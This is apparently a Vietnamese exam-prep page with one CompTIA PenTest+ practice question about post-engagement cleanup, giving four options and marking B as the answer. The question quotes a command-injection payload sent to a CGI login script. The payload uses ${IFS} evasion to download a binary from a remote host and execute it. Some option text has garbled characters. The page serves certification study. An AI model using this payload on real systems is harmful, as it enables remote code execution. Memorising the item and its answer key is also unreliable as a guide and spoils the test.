Câu 8: PT1-002: CompTIA PenTest+ Certification Exam
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${…
Nội dung câu hỏi
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `" c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a`exploit += `HTTP/1.1`Which of the following commands should the penetration tester run post-engagement?
Các lựa chọn
Đáp án được giữ gọn theo nhãn A, B, C, D trong phần bình chọn tương tác.
- A. grep ג€"v apache ~/.bash_history > ~/.bash_history
- B. rm ג€"rf /tmp/apache — đáp án hiện tại
- C. chmod 600 /tmp/apache
- D. taskkill /IM ג€apacheג€ /F
Cộng đồng
0 bình luận công khai. Tên thành viên được ẩn một phần.